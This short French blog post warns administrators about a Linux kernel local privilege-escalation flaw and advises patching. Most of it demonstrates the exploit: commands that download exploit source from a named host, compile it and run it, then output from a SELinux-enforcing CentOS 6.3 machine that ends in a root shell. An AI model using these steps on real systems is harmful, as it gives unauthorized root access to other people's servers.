Local Root Exploit 2.6.32

Petit article afin de vous annoncer une mauvaise nouvelle pour vos serveurs.
Oui car une nouvelle faille vient d’être découverte dans le kernel Linux et qui permet de passer sous ROOT.

Cette vulnérabilité concerne donc les distributions sous Linux et dont le kernel ce trouve entre la version « 2.6.32″ et « 3.8.8″.
Les versions de RedHat 6.3 et CentOS 6.3 sont également concerné par cette faille ( même avec le SELinux ) et de même que Debian Wheezy 7.
Le moyen de parchet la chose est de mettre à jour le système, par contre c’est pas encore très sûr sur le patch soit sortie actuellement

Cette faille risque de faire très mal si vous avez une faille CMS avec l’injection d’un WebShell !
De même que si vous utilisez de mode PHP en FPM, l’exploit reste la aussi exploitable.

Sébastien de Tux-Planet nous a fait la démonstration ( que je confirme également sur mon propre système ) :

$ wget www.tux-planet.fr/public/hack/exploits/kernel/semtex.c
$ gcc -O2 semtex.c -o semtex
$ ./semtex

Par exemple sur une distribution sous CentOS 6.3 :

$ cat /etc/redhat-release
CentOS release 6.3 (Final)
$ uname -a
Linux test1.hq.company.com 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
$ id
uid=503(user) gid=503(user) groups=503(user)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
$ sestatus
SELinux status: enabled
SELinuxfs mount: /selinux
Current mode: enforcing
Mode from config file: enforcing
Policy version: 24
Policy from config file: targeted
$ ./semtex
2.6.37-3.x x86_64
sd@fucksheep.org 2010
-sh-4.1# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

Read More